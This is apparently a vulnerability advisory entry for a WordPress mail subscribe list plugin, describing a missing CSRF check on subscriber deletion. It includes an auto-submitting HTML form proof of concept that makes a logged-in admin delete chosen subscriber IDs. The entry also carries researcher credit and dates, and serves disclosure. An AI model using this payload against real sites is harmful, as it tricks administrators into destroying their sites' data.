The plugin does not have CSRF check in place when deleting subscribed users, which could allow attackers to make a logged in admin perform such action and delete arbitrary users from the subscribed list
<form id="test" action="https://example.com/wp-admin/admin.php?page=mail-subscribe-list/index.php" method="POST"> <input type="text" name="sml_remove" value="1"> <input type="text" name="rem[]" value="1"> <input type="text" name="rem[]" value="4"> </form> <script> document.getElementById("test").submit(); </script>
Daniel Ruf
Daniel Ruf
Yes
2022-05-26 (about 1 years ago)
2022-05-26 (about 1 years ago)
2023-02-22 (about 3 months ago)